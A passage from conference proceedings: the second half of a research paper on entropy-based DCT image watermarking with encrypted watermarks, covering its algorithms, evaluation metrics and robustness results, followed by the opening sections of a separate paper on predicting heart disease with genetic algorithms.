are selected based on the entropy value. The watermark is inserted in the chosen segments by
using two DCT coefficients; it is required that the variation between these coefficients
be fair and that they lie in the low-frequency region. The robustness increases with
the distance [43]. The watermark image is encrypted by a bit-XOR encryption technique,
and this increases the security because an attacker would not be able to draw out
the original watermark from the watermarked image [44]. The encrypted watermark is
placed in selected DCT coefficients such that the watermark strength is adaptive for each
block, which improves the watermark imperceptibility property.

3 Proposed Digital Image Watermarking Algorithm

The proposed digital image watermarking algorithm utilizes the concepts of water-
mark encryption, entropy and DCT for inserting the watermark in the host picture.
DCT is used to transform the image from the spatial domain to
the frequency domain by representing the image as a series of cosine waves at
different frequencies. To optimize the results, the entropy of
every block is calculated. Furthermore, the blocks are then arranged depending upon their
entropy values. The blocks with less entropy are used for embedding the watermark
[45]. Here, the method is adaptive as the embedding strength for each block changes
with the characteristics of the block. To attain more security, watermark encryption
is done using the predefined mathematical function. In this section, the proposed
digital image watermarking technique is described. It comprises the algorithm for
embedding the watermark, which is covered in Sect. 3.1. Furthermore, the algorithm for

Fig. 1 Proposed watermark embedding model

extracting the watermark is covered in Sect. 3.2, and their block diagrams are shown
in Figs. 1 and 2, respectively.

3.1 Proposed Watermark Embedding Algorithm

Step 1. Read the host image IMG and watermark image WM.
Step 2. Encrypt watermark with the predefined mathematical function.
The objective is to secure the watermark from attackers. It is arduous for attackers to
obtain the original watermark. The process of encryption is done using the predefined
mathematical function.
Step 3. Divide the Image IMG into non-overlapped 8 × 8 blocks.
Step 4. Calculate the Entropy of each block.

The concept of Entropy Technique


The term entropy was introduced by Shannon in 1948. He stated that an image with higher
entropy contains more information: the higher the entropy, the higher the information content.

Fig. 2 Proposed watermark extraction model

Entropy is the average of the uncertainty value in an image. The Shannon entropy of a random
variable X is given by the following formula, where p(x) is the probability mass
function, whose value lies between 0 and 1. The value of −log p(x) represents the
information related to the single bit x. If the probability of the pixel is zero, then it
will not contribute to the entropy calculation, as 0 log 0 = 0. The higher the value of
entropy, the more information it stores.

H(X) = − ∑_{x∈X} p(x) log p(x)    (1)

This formula in Eq. 1 is used to find the entropy of each block.
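As an illustration of Step 4, the block entropy of Eq. 1 can be computed from the grey-level histogram of an 8 × 8 block. The short Python sketch below is only a minimal illustration; the function name, the 256-bin histogram and the base-2 logarithm are our own assumptions, not details prescribed by the paper.

import numpy as np

def block_entropy(block):
    # Shannon entropy (Eq. 1) of a greyscale block, estimated from its histogram
    hist, _ = np.histogram(block, bins=256, range=(0, 256))
    p = hist / hist.sum()          # probability mass function p(x)
    p = p[p > 0]                   # 0*log(0) is treated as 0, so drop empty bins
    return -np.sum(p * np.log2(p))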


Step 5. Sort the blocks based on the entropy value in ascending order.
The blocks with low variations in the frequency are needed for embedding the water-
mark bits. The blocks in the DCT coefficients are arranged in the order of increasing
variations; the starting blocks have the least variation, and the last block has the most
variation.
The watermark bits are embedded in the blocks possessing low entropy [46]
because these blocks have the capacity to withstand attacks; this results in less
distortion for low-entropy blocks.

Step 6. The DCT value is calculated for each block and watermark is embedded in
two selected coefficients “bi” and “bj”.
Step 7. Compute watermark strength.
For embedding the watermark, its strength is adjusted on the basis of the mean of the
blocks. This keeps the strength of the watermark related to the local characteristics
of the block. Furthermore, it also helps to embed the watermark with a lesser impact
on the imperceptibility of the image.
The watermark strength Alpha is computed as the mean of the selected blocks.
Alpha = (1/n) ∑_{i=1}^{n} dct(i, j)    (2)

where “n” is block size, i and j are the positions of DCT coefficients in a block of
size 8 × 8.
Step 8. Embed watermark bits.
If watermark bit is one, then modify the selected coefficients in accordance with Eq. 3.
And if watermark bit is zero, then modify the selected coefficients in accordance with
Eq. 4.

bi = bi + Alpha ∗ μ
bj = bj − Alpha ∗ μ (3)

bi = bi − Alpha ∗ μ
bj = bj + Alpha ∗ μ (4)

Here “bi” and “bj” are the chosen DCT coefficients, μ is strength multiplier. When
wi = 1, watermark strength is added to the coefficient “bi” and subtracted from “bj”.
Furthermore, when wi = 0, watermark strength is subtracted from the coefficient
“bi” and added to “bj”. This makes “bi” greater if watermark bit is one and “bj”
greater if watermark bit is zero.
Step 9. Generate the Watermarked Image.
Combine all 8 × 8 blocks after modifications in the bits and apply inverse DCT to
generate the watermarked image.
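A compact sketch of Steps 3–9 is given below, assuming NumPy, SciPy's dct and the block_entropy helper sketched in the entropy discussion above. The coefficient positions (the pair (i, j) and its transpose), the strength multiplier mu, and the reading of Eq. 2 as the mean of a block's DCT coefficients are illustrative assumptions; the paper selects the two coefficients through its predefined mathematical function.

import numpy as np
from scipy.fftpack import dct, idct

def dct2(b):
    return dct(dct(b, axis=0, norm='ortho'), axis=1, norm='ortho')

def idct2(b):
    return idct(idct(b, axis=0, norm='ortho'), axis=1, norm='ortho')

def embed(img, wm_bits, i=3, j=4, mu=0.9):
    # Steps 3-9: embed encrypted watermark bits into the lowest-entropy 8x8 blocks
    img = img.astype(float).copy()
    h, w = img.shape
    blocks = [(r, c) for r in range(0, h, 8) for c in range(0, w, 8)]
    # Steps 4-5: sort blocks by entropy, lowest entropy first
    blocks.sort(key=lambda rc: block_entropy(img[rc[0]:rc[0] + 8, rc[1]:rc[1] + 8]))
    for (r, c), bit in zip(blocks, wm_bits):
        B = dct2(img[r:r + 8, c:c + 8])
        alpha = B.mean()                      # Step 7: adaptive strength (Eq. 2)
        if bit == 1:                          # Step 8: Eq. 3
            B[i, j] += alpha * mu
            B[j, i] -= alpha * mu
        else:                                 # Step 8: Eq. 4
            B[i, j] -= alpha * mu
            B[j, i] += alpha * mu
        img[r:r + 8, c:c + 8] = idct2(B)      # Step 9: inverse DCT per block
    return np.clip(img, 0, 255).astype(np.uint8)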

3.2 Proposed Watermark Extraction Algorithm

Step 1: Take the watermarked image as an input.


Step 2: Divide the watermarked image WIMG into non-overlapped 8 × 8 blocks.

Step 3: Calculate entropy of each block by applying the formula used for
embedding watermark, as presented in Eq. 1.
Step 4: Sort the blocks based on the entropy value in ascending order, to select
the blocks with low entropy value.
Step 5: Apply the DCT transformation on each block.
Step 6: Choose two coefficients “bi” and “bj” in each block using the predefined
mathematical function.
Step 7: If “bi” is greater than “bj”, bit one is extracted, and if “bj” is greater than
“bi ”, bit zero is extracted.
Step 8: The predefined mathematical function is employed to reconstruct the
watermark from the encrypted watermark.
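For completeness, a matching blind-extraction sketch is shown below, reusing the dct2 and block_entropy helpers from the embedding sketch: it needs only the watermarked image, the same block ordering and the same coefficient positions, which are again illustrative assumptions rather than the paper's predefined function.

def extract(wimg, n_bits, i=3, j=4):
    # Steps 2-7: recompute entropies, revisit the same low-entropy blocks and compare coefficients
    wimg = wimg.astype(float)
    h, w = wimg.shape
    blocks = [(r, c) for r in range(0, h, 8) for c in range(0, w, 8)]
    blocks.sort(key=lambda rc: block_entropy(wimg[rc[0]:rc[0] + 8, rc[1]:rc[1] + 8]))
    bits = []
    for r, c in blocks[:n_bits]:
        B = dct2(wimg[r:r + 8, c:c + 8])
        bits.append(1 if B[i, j] > B[j, i] else 0)
    return bits   # still encrypted; Step 8 applies the inverse of the bit-XOR step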

4 Experimental Results and Comparison

For testing and evaluation of performance, PSNR, NC, SSIM and BER values are
used. These values helped to measure the quality of watermarking such as robustness
and imperceptibility.
PSNR (Peak Signal to Noise Ratio)
PSNR is used to compare the imperceptibility of the cover image and watermarked
image. It is expressed in terms of logarithmic decibel scale.
 
PSNR = 10 log₁₀ ((L ∗ L)/MSE)    (5)

Here, L denotes the peak signal value for the cover image, and it is 255 for an 8-bit
image. For better imperceptibility, a high PSNR is needed. MSE is applied to compare
the quality of the image after inserting the watermark. It is measured as the cumulative
squared error between the host image and the watermarked image. The lower the value of MSE,
the better the results.

MSE = (1/(M ∗ N)) ∑_{m=1}^{M} ∑_{n=1}^{N} [I₁(m, n) − I₂(m, n)]²    (6)

where I₁ is the host image and I₂ is the watermarked image.


NC (Normalized correlation)
It measures the similarity between the embedded watermark and the extracted watermark. The
formula is represented by the equation below.
NC = (∑_{i=1}^{M} ∑_{j=1}^{N} w(i, j) w′(i, j)) / (√(∑_{i=1}^{M} ∑_{j=1}^{N} w(i, j)²) · √(∑_{i=1}^{M} ∑_{j=1}^{N} w′(i, j)²))    (7)

SSIM (Structural similarity)


SSIM is used to find out the comparability between the cover image and the image
embedded with watermark. Its value varies from −1 to +1. If images are identical,
then the resultant value is +1, and if images are fully dissimilar, then the resultant
value is 0. The values for the rest of the cases lie in between 0 and 1. SSIM equation
between two images x and y of size N × N is given below.

SSIM = ((2μ_x μ_y + c₁)(2σ_xy + c₂)) / ((μ_x² + μ_y² + c₁)(σ_x² + σ_y² + c₂))    (8)

Here,
μ_x indicates the average of x,
μ_y indicates the average of y,
σ_x² indicates the variance of x,
σ_y² indicates the variance of y,
σ_xy indicates the covariance of x and y,
c₁ = (k₁L)², c₂ = (k₂L)² are two variables that stabilize the division with a weak denominator,
L indicates the dynamic range of the pixel values, and it is 2^(bits per pixel) − 1,
k₁ = 0.01 and k₂ = 0.03 by default.

BER (Bit Error Rate)


BER is the ratio of the number of erroneous bits to the total number of bits in the
image. The lower the value of BER, the better the results. The equation to
compute BER is given below.

BER = Error Rate / Size of Image    (9)
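A minimal NumPy sketch of how PSNR, NC and BER can be computed from Eqs. 5–7 and 9 is given below (SSIM is usually taken from a library such as scikit-image); the function and variable names are our own.

import numpy as np

def psnr(host, marked, L=255):
    mse = np.mean((host.astype(float) - marked.astype(float)) ** 2)   # Eq. 6
    return 10 * np.log10((L * L) / mse)                               # Eq. 5

def nc(wm, wm_ext):
    w, we = wm.astype(float), wm_ext.astype(float)
    return np.sum(w * we) / (np.sqrt(np.sum(w ** 2)) * np.sqrt(np.sum(we ** 2)))  # Eq. 7

def ber(wm, wm_ext):
    return np.mean(wm.astype(int) != wm_ext.astype(int))              # Eq. 9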

To evaluate the results, the robustness and imperceptibility of the system are
measured. NC and BER are used to assess the robustness of the watermark information;
they quantify the relationship between the inserted watermark and the extracted water-
mark. Concerning the evaluation of visual quality, PSNR and SSIM are used. The
coding and testing of the proposed blind image watermarking technique are carried
out using MATLAB R2020a. This section presents the experimental
outcomes of the suggested approach.
Imperceptibility Test: The results are compared with those of the existing methods. For
a fair comparison, standard images are used, namely Cameraman, Pepper,
Lena, Girl and Barbara. A greyscale image of resolution 512 × 512 is used for the
experiment, and a binary image of resolution 32 × 32 is used as the watermark
image. Table 1 shows the PSNR values of the proposed system. PSNR values are
greater than 40 dB, which shows good imperceptibility. SSIM values are computed
between the original image and the watermarked image. SSIM values are greater than
0.8, as shown in Fig. 3, which indicates great similarity between the original image and

Table 1 PSNR values of the proposed method for distinctive images (original and watermarked image thumbnails omitted)

Image name     PSNR (dB)
Lena           44.4274
Cameraman      43.1369
Pepper         41.4201
Girl           43.3583
Barbara        41.4759

the watermarked image. Furthermore, it also indicates good embedding strength in
the watermarked image.
Robustness Test: To test the robustness of the watermarked image, it undergoes
various types of attacks, namely median filter, average filter, resize, JPEG compres-
sion, rotation, histogram equalization, Wiener filter, Gaussian filter and translation.
Table 2 shows NC values under these attacks. Results are computed on standard
images, namely Lena, Cameraman, Girl, Barbara and Pepper. The value of NC is
one under all the attacks except for the average filter attack, cropping attack and
translation attack. The NC values imply that the extracted watermark is profoundly
correlated with the actual watermark and has a meagre error rate.
The proposed method maintains higher NC values. To analyse the robustness of the
proposed method comprehensively under various attacks, the strength of the attacks

Fig. 3 SSIM values for the original image and watermarked image

is varied. The results are shown through bar charts in Figs. 4–9.
To check the robustness under the rotation attack, the watermarked image is rotated from
−3° to +3° in increments of 1°. Results are shown in Fig. 4. On analysis, it
is apparent from the results that the minimum NC value is 0.97, which indicates good
robustness. The NC value decreases as the degree of rotation increases. Gaussian
noise is added to the image; the level of noise is varied from 1 to 5% in
increments of 1%. The NC value remains close to one with little to no change when the
noise is varied from 1 to 3%, and with a further increase in noise, the NC value decreases.
Results are shown with the help of a bar chart in Fig. 5.
Robustness under the cropping attack is checked by cropping the watermark from
0 to 50% with the increment of 10%. The value of robustness (NC value) stays close
to one till 20% cropping. After 20% cropping, there is a decrease in NC value for
further increment in cropping. Figure 6 shows that the proposed method achieved
encouraging results. In order to figure out the robustness of the proposed method
under the JPEG compression attack, robustness is checked over different values
of quality factor. Quality factor (QF) shows the amount of information preserved
after compression. Greater QF value would mean more information is preserved
under compression attack. The value of NC is 1 for all the test images under the
compression attack while the range of QF is in between 100 and 60, and after that,
NC value decreases as QF decreases. Results are shown in Fig. 7.
The proposed method is calculated for robustness under the median filter attack.
The filter size is varied from 1 × 1 to 5 × 5. The minimum value of NC is more
than 0.95 under all the variations of the attack. Figure 8 shows the results of the
introduced method under this attack. Under the Wiener filter attack, the value of NC
decreases when the filter size increases; the minimum value of NC is 0.95 for the
method. To calculate the robustness precisely, the filter size is varied from 1 × 1
to 5 × 5. Upon analysis under varied strengths of the attack, it is evident that the
Table 2 NC values and BER values of the proposed method
Attack Lena Cameraman Pepper Girl Barbara
BER NC BER NC BER NC BER NC BER NC
No attack 0 1 0 1 0 1 0 1 0 1
Median filter 0 1 0 1 0 1 0 1 0 1
Average filter 0.039 0.96 0.017 0.9957 0.0043 0.9957 0.039 0.9606 0.0065 0.9935
Resize 0 1 0 1 0 1 0 1 0 1
JPEG Compression 0 1 0 1 0 1 0 1 0 1
Rotation 0 1 0 1 0 1 0 1 0 1
Histogram equalization 0 1 0 1 0 1 0 1 0 1
Wiener filter 0 1 0 1 0 1 0 1 0 1
Gaussian filter 0 1 0 1 0 1 0 1 0 1
Translation 0.019 0.98 0.0025 0.9975 0.019 0.9808 0.011 0.989 0.003 0.997
Cropping 0.019 0.98 0.0031 0.9969 0.011 0.9989 0.008 0.992 0.002 0.998

Fig. 4 NC values for rotation attack

Fig. 5 NC values for Gaussian noise attack

Fig. 6 NC values for cropping attack

Fig. 7 NC values for JPEG compression attack

Fig. 8 NC values for median filter attack

proposed method achieved great robustness as NC value lies in between 0.9 and 1.
Results are shown in Fig. 9.

Comparison with existing methods The proposed method is compared with several existing
methods in terms of NC values and PSNR values, as shown in Tables 3 and 4.
It is clear from Table 3 that the existing methods achieved lower
PSNR values than the introduced method, which indicates the better imperceptibility of
this method. Table 4 shows that higher NC values are obtained by the proposed
method than by the existing methods. Under different attacks, the method achieves NC values
close to 1, which is clear proof of the method's robustness.

Fig. 9 NC values for Wiener filter attack

Table 3 PSNR value comparison with the existing state-of-the-art methods

Methods                   PSNR (dB)
Proposed method           44.4274
Garg and Kishore [35]     42.6369
Prabha and Sam [47]       36.3689
Yuan et al. [48]          39.976

Table 4 NC value comparison with the existing state-of-the-art methods

S. No.  Attack                   Proposed   Garg and Kishore [35]   Prabha and Sam [47]   Yuan et al. [48]
1       No attack                1          1                       1                     1
2       Median filter            1          1                       1                     0.914
3       Average filter           0.9606     0.9870                  0.9134                0.9028
4       Resize 256               1          1                       0.9888                0.9941
5       JPEG compression         1          1                       0.9979                0.9891
6       Rotation                 1          1                       0.9045                0.9179
7       Histogram equalization   1          1                       0.9186                0.9045
8       Wiener filter            1          1                       0.9431                0.9363
9       Gaussian filter          1          1                       0.9363                0.9045
10      Translation              0.9808     0.9606                  0.9179                0.9026
11      Cropping                 0.9801     0.9536                  0.9438                0.9664

5 Conclusion

In this paper, the concepts of Shannon’s entropy in the DCT domain and water-
mark encryption are used to embed the watermark in the host image. The proposed
method embeds the watermark in such a way that extraction can be done blindly,
and at the same time, it provides a balance between robustness and imperceptibility.
The entropy-based block selection and encryption of the watermark with discrete
cosine transform give more reliable outcomes than common discrete cosine trans-
form methods in digital watermarking. Additionally, the watermarking technique is
secured for the reason that the process of encryption takes place before embedding
any watermark. The watermark persists under all the varied attacks as NC remains
close to value 1; this betokens that the method maintains high robustness. The image
continues to be imperceptible because the average PSNR value is 42.7362. The
proposed method is also adaptive, as embedding strength depends upon the charac-
teristics of the local block; this makes the method even more imperceptible. Results
are compared with existing methods [35, 47, 48], which authenticate that the proposed
method is relatively better.

References

1. Berghel, H., & O’Gorman, L. (1996). Protecting ownership rights through digital watermarking.
Computer, 29(7), 101–103.
2. Chang, C. C., Hwang, K. F., & Hwang, M. S. (2003). A digital watermarking scheme using
human visual effects. Informatica, 24(4), 505–511.
3. Alshanbari, H. S. (2020). Medical image watermarking for ownership and tamper detection.
Multimedia Tools Application.
4. Fazlali, H. R., Samavi, S., Karimi, N., et al. (2017). Adaptive blind image watermarking using
edge pixel concentration. Multimedia Tools Application, 76, 3105–3120.
5. Isinkaye, F., & Aroge, T. (2005). Watermarking techniques for protecting intellectual properties
in a digital environment. Journal of Computer Science and Technology, 12(27).
6. Giri, K., Quadri, S., & Bashir, R. (2018). DWT based colour image watermarking: A review.
Multimedia Tools Application, 79, 32881–32895.
7. Zebbiche, K., Khelifi, F., & Loukhaoukha, K. (2018). Robust additive watermarking in the
DTCWT domain based on perceptual masking. Multimedia Tools Application, 77, 21281–
21304.
8. Escalante-Ramírez, B., Gomez-Coronel, S. L. (2018). A perceptive approach to digital image
watermarking using a brightness model and the Hermite transform. Mathematical Problems in
Engineering, 2018, 19. Article ID 5463632.
9. Gaaed, M., Almutiri, M. T., Ben, O. (2018). Digital image watermarking based on LSB
techniques: A comparative study. International Journal of Computer Applications.
10. Su, Q., Decheng, L., Zihan, Y., et al. (2019). New rapid and robust colour image watermarking
technique in spatial domain. IEEE Access, 7, 30398–30409.
11. AL-ardhi, S., Thayananthan, V., & Basuhail, A. (2020). A new vector map watermarking
technique in frequency domain based on LCA-transform. Multimedia Tools Application, 79,
32361–32387.
12. Agarwal, N., & Singh, P. (2019). Survey of robust and imperceptible watermarking. Multimedia
Tools and Applications, 78. https://doi.org/10.1007/s11042-018-7128-5.

13. Cox, I., Kilian. J., Leighton, F., & Shamoon, T. (1996). Secure spread spectrum watermarking
for multimedia. IEEE Transactions on Image Processing.
14. Khan, A. (2020). 2DOTS-multi-bit-encoding for robust and imperceptible image watermarking.
Multimedia Tools Application.
15. Singh, R., Shaw, D., Jha, S., & Kumar, M. (2017). A DWT-SVD based multiple watermarking
schemes for image-based data security. Journal of Information and Optimization Sciences, 39,
1–16. https://doi.org/10.1080/02522667.2017.1372153.
16. Feng, B., Yu, B., Bei, Y., & Duan, X. (2019). A reversible watermark with a new overflow
solution. IEEE Access, 7, 28031–28043.
17. Shih, F., & Zhong, X. (2016). Intelligent watermarking for high-capacity low-distortion data
embedding. International Journal of Pattern Recognition and Artificial Intelligence.
18. Savakar, D. G., & Ghuli, A. (2019). Robust invisible digital image watermarking using hybrid
scheme. Arabian Journal for Science and Engineering, 44, 3995–4008.
19. Garg, P., & Kishore, R. (2019). Performance comparison of various watermarking techniques.
Multimedia Tools and Applications, 79(35–36), 25921–25967.
20. Loan, N. A., Hurrah, N. N., Parah, S. A., Lee, J. W., Sheikh, J. A., & Bhat, G. M. (2018). Secure
and robust digital image watermarking using coefficient differencing and chaotic encryption.
IEEE Access, 6, 19876–19897.
21. Sanyal, N., Chatterjee, A., & Munshi, S. (2006). An adaptive bacterial foraging algorithm for
fuzzy entropy-based image segmentation. Expert Systems with Applications, 38(12), 15489–
15498.
22. Sharma, P. (2012). Analysis of image watermarking using least significant bit algorithm.
International Journal of Information Sciences and Techniques.
23. Boussif, M., Aloui, N., & Cherif, A. (2020). DICOM imaging watermarking for hiding medical
reports. Medical & Biological Engineering & Computing, 58, 2905–2918.
24. Byun, S., Son, H., & Lee, S. (2019). Fast and robust watermarking method based on DCT
specific location. IEEE Access, 7, 100706–100718.
25. Malik, S., & Reddlapalli, R. (2018). Histogram and entropy based digital image watermarking
scheme. International Journal of Information Technology.
26. Thanki, R., & Borra, S. (2019). Fragile watermarking for copyright authentication and tamper
detection of medical images using compressive sensing (CS) based encryption and contourlet
domain processing. Multimedia Tools Application, 78, 13905–13924.
27. Yang, C., Zhu, C., Wang, Y., et al. (2020). A robust watermarking algorithm for vector
geographic data based on QIM and matching detection. Multimedia Tools Application, 79,
30709–30733.
28. Mehta, R., Gupta, K., & Yadav, A. K. (2020). An adaptive framework to image watermarking
based on the twin support vector regression and genetic algorithm in lifting wavelet transform
domain. Multimedia Tools Application, 79, 18657–18678.
29. Deljavan, A., Meghdadi, M., & Amiri, A. (2018). HVS-based scalable image watermarking.
Multimedia Tools and Applications.
30. Celik, M., Sharma, U., Saber, G., & Tekalp, A. (2002). Hierarchical watermarking for secure
image authentication with localization. IEEE Transactions on Image Processing, 11(6), 585–
595.
31. Kumar, R., Das, R., Mishra, V., & Dwivedi, R. (2011). Fuzzy entropy-based neuro-wavelet
identifier-cum-quantifier for discrimination of gases/odours. IEEE Sensors Journal, 11(7),
1548–1555.
32. Alzubi, O. A., Nazir, J. A. A. S., & Hamdoun, H. (2015). Cyber attack challenges and resilience
for smart grids. European Journal of Scientific Research.
33. Yuan, Z., Liu, D., & Zhang, X., & Su, Q. (2019). New image blind watermarking method based
on two-dimensional discrete cosine transform. Optik, 164152.
34. Zhang, L., Yan, H., Zhu, R., et al. (2020). Combinational spatial and frequency domains
watermarking for 2D vector maps. Multimedia Tools Application, 79, 31375–31387.
35. Garg, P., & Kishore, R. (2020). Secured and multi optimized image watermarking using SVD
and entropy and prearranged embedding locations in transform domain. Journal of Discrete
Mathematical Sciences and Cryptography, 23(1), 73–82.

36. Mohammed, A., Salih, D., Saeed, A., et al. (2020). An imperceptible semi-blind image water-
marking scheme in DWT-SVD domain using a zigzag embedding technique. Multimedia Tools
Application, 79, 32095–32118.
37. Kamble, S., Maheshkar, V., Agarawal, S. V. (2010). Robust multiple watermarking using
entropy based spread spectrum. Communications in Computer and Information Science (CCIS),
94, 497–507.
38. Gul, E., & Ozturk, S. (2020). A novel triple recovery information embedding approach for
self-embedded digital image watermarking. Multimedia Tools Application, 79, 31239–31264.
39. Mehta, R., Rajpal, N., & Vishwakarma, V. (2016). Adaptive Image Watermarking Scheme
Using Fuzzy Entropy and GA-ELM hybridization in DCT domain for copyright protection.
Journal of Signal Processing Systems, 84, 265–328.
40. Mokhtari, Z., & Melkemi, K. (2011). A new watermarking algorithm based on entropy concept.
Acta Applicandae Mathematicae, 116, 65–69.
41. Alzubi, J. A., Manikandan, R., Alzubi, O. A., Qiqieh, I., Rahim, R., Gupta, D., & Khanna,
A. (2020). Hashed Needham Schroeder Industrial IoT based cost optimized deep secured data
transmission in cloud. Measurement.
42. Alzubi, J. A., Manikandan, R., Alzubi, O. A., Gayathri, N., & Patan. R. (2019). A survey of
specific IoT applications. International Journal on Emerging Technologies.
43. Pevný, T., Filler, T., & Bas, P. (2010). Using high-dimensional image models to perform highly
undetectable steganography. In Proceedings of International Workshop on Information Hiding,
Calgary Canada (pp. 161–177).
44. Liu, X., et al. (2019). A novel robust reversible watermarking scheme for protecting authenticity
and integrity of medical images. IEEE Access, 7, 76580–76598.
45. Dappuri, B., Rao, M. P., & Sikha, M. B. (2020). Non-blind RGB watermarking approach using
SVD in translation invariant wavelet space with enhanced Grey-wolf optimizer. Multimedia
Tools Application, 79, 31103–31124.
46. Tyagi, S., Singh, H., & Agarwal, R. (2017). Image watermarking using genetic algorithm in
DCT domain. In International Conference on Inventive Systems and Control (ICISC).
47. Prabha, K., & Sam, S. (2020). A novel blind color image watermarking based on Walsh
Hadamard transform. Multimedia Tools Application, 79, 6845–6869.
48. Yuan, Z., Liu, D., Zhang, X., et al. (2020). DCT-based color digital image blind watermarking
method with variable steps. Multimedia Tools Application, 79, 30557–30581.
Prediction of Heart Disease Using
Genetic Algorithm

Nagaraj M. Lutimath, H. V. Ramachandra, S. Raghav, and Neha Sharma

Abstract Medical practitioners depend on medical diagnosis systems for detection,


diagnosis, and treatment of various diseases in recent years. Genetic algorithms play a
vital role as an essential optimization approach for problems involving classification
in machine learning. Genetic algorithms can also achieve a high level of prediction
and accuracy. Coronary heart disorder is a major heart disorder that narrows the
blood vessels that supply oxygen to the heart. In this paper, we analyze and predict
heart diseases among patients using genetic algorithms. The heart disease data set
from the UCI machine learning repository data set is used. The proposed method
utilizes the data set on heart disease available at the UCI machine learning repository
and provides better classification accuracy and prediction among the patients with
various heart disorders. Implementation is carried out using Python language.

Keywords Classification · Genetic algorithm · Heart disease · Machine learning ·


Optimization · Prediction · Python

1 Introduction

Machine learning (ML) is a science that enables a computer to learn on its own
from the training process, without explicitly programming the computer. ML algo-
rithms can analyze historical data sets from different sources. Machine learning
techniques involve two types of data sets, a training data set needed to train the
model or algorithm, and a test data set used for predicting and classification of the
model.

N. M. Lutimath · N. Sharma (B)


Chandigarh University, Mohali 140413, Punjab, India
H. V. Ramachandra
CMR University, Bengaluru 562149, India
S. Raghav
Sir M Visvesvaraya Institute of Technology, Bengaluru 562157, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_4

Across the world, one of the major causes of death among humans is heart attack.
People with heart disorders suffer from severe illness, physical disability, and
decreased quality of life. By identifying the proper risk factors, heart diseases
can be detected early and controlled. Also, timely detection, diagnosis, and
treatment will reduce the number of deaths related to heart diseases. Early identification
of heart disease is a critical issue. Traditional methods are ineffective in identifying
the presence of such diseases, so current techniques like AI and machine learning,
which are more accurate, reliable, and effective in detecting and diagnosing people with
heart ailments, can lead to a reduction in the mortality rate.
Genetic algorithms can be used to auto-tune classification
methods like random forest, XGBoost, and neural networks. The usage of genetic algo-
rithms improves a classification algorithm's performance by identifying the most
prominent features in the heart disease data set. Genetic algorithms determine the
weights associated with the features in the neural networks with a smaller number of iter-
ations. The Z-Alizadeh Sani data set, with details of 303 patients including ECG, echo,
demographic, and laboratory examinations, has been used. The computational results of the
genetic algorithm model show that the overall performance can be further improved by
the use of an ensemble process giving equal importance to all three models. Better
prediction accuracy of the disease was observed using classification procedures such
as AdaBoost, bagged trees, random forest, and majority-voted output [1].
The heart is an important organ which pumps blood to various organs of the body.
Other vital organs like the kidney and brain need a sufficient supply of oxygen for their
functioning. Medical professionals like cardiologists and thoracic, vascular, and inter-
ventional radiologists treat cardiovascular diseases. WHO has estimated around 12
million deaths due to heart disorders every year worldwide [2].
The rest of the paper is organized as follows: Sect. 2 describes the existing
literature and related work; Sect. 3 describes the classification procedure; Sect. 4
describes the classification methods used; Sect. 5 describes the characteristic feature
engineering of the attributes in the data set; Sect. 6 deals with prediction and
performance analysis; and Sect. 7 presents the conclusion.

2 Related Work

Classification is a key learning concept for machine learning. It has three basic forms,
namely supervised, unsupervised, and semi-supervised classification. The predic-
tion model can be created using any of the three learning procedures using suitable
training data set. A heart disease diagnosis framework with machine intelligence was
presented for analysis [3]. The proposed framework was used to predict the records of
heart patients, and factor analysis of mixed data (FAMD) was utilized
to extract the derived attributes from the UCI heart disorder data set. A holdout vali-
dation approach was used for validation. An association rule approach was used to classify
the data sets efficiently, and appropriate rules were generated for the heart disorder [4].
Prioritization of rules was done, and the rules were categorized into original rules
and pruned rules. The proposed system was efficient in decision making based on the
specified parameters. During the training of the model, tenfold validation method was
used. Accuracies of 86.3 and 87.3% were achieved in the training phase and testing
phase, respectively. Neural networks for prediction have been studied by many researchers,
as the quality of prediction can be improved using a neural network model. A hybrid
approach, in which a neural network is augmented by another machine learning procedure,
was proposed for the diagnosis of heart disorders [5]. The initial weights of
the neural network were enhanced using genetic algorithms, and the performance
of the neural network was subsequently increased by 10%. During performance anal-
ysis, accuracy, sensitivity, and specificity rates of 93, 97, and 92% were achieved, respectively.
The data set from Z-Alizadeh Sani was used for analysis. Computer-aided techniques
are essential for the automated identification of persons suffering from heart disorders. An
automated classification procedure between normal and heart disease patients using
ECG with the application of higher-order statistics and spectra was proposed [6].
Automated heart disorder identification using a nonlinear HOS attribute extraction
approach and ECG signals was carried out. A promising result was achieved when normal
and heart-disorder-affected ECG signals were used. Using 31 cumulant features, an
accuracy of 98.99% was achieved. In recent times, deep learning has become one
of the important areas of machine learning. It is concerned with multilayer neural
networks and is motivated by the functioning and structure of the human brain. To
enhance the deep learning method, a deep belief network with an optimal configuration
for the prediction of heart disease, based on Ruzzo–Tompa and a stacked genetic algorithm, was
proposed in [7]. Some of the important attributes were used for the prediction of the
heart disorder along with three different types of classification methods. XGBoost,
random forest, and neural networks were used with genetic algorithms [8]. The most
important attributes were used for maximizing classification performance using the Z-Alizadeh Sani
data set with demographic examinations of 303 patients.
racy of the prediction model can be improved by choosing the correct sequence of
characteristic features. The research should aim to improve the prediction accu-
racy for the presence of cardiovascular disease by identifying significant features
using data mining techniques [9]. Prediction models were developed by combining
characteristic feature engineering from data sets and by utilizing classification tech-
niques like decision tree, Naive Bayes theorem, K-nearest neighbor, artificial neural
networks, logistic regression (LR) model, and support vector machine (SVM) to
name a few. The vote approach model, using the vital specified features, predicted heart
disease with an accuracy of 87.4% [10]. Multivariate analysis
is one of the vital methods in attribute selection. Logistic regression and artificial neural
networks are utilized in machine learning classification approaches. Along
with these classification techniques, evolutionary algorithms have evolved as one
of the important procedures for building prediction models [11]. In recent years, investi-
gation and research toward classification techniques have drawn attention among
researchers. Improving the accuracy of the classification ensemble has become an
ultimate goal. Deep learning is also a vital technique for classification [12]. An inno-
vative metaheuristic method with feature extraction and prediction was introduced

for the purpose of usability. Usability is an important factor as defined by several


researchers in relation with hierarchical-based software usability [13].

3 Classification

Classification learning is normally a supervised procedure that takes an example
in the data set and assigns it to a class attribute. An example has two parts:
the predictor attribute values and the target attribute values. Classification can be super-
vised, unsupervised, or semi-supervised in machine learning. In the supervised learning
approach, examples consist of labeled classes. The classification learning approach
considers categorical values, whereas the regression procedure takes numerical values. In
the unsupervised learning approach, the classes are not labeled but are grouped into
clusters as per their attribute characteristics. Semi-supervised learning utilizes both
labeled and unlabeled class data.
In classification, the predictor attribute values are used to predict the value of the
target attribute and, thereby, the class of an example.
The training and test data set are disjoint sets obtained by segregating the data set
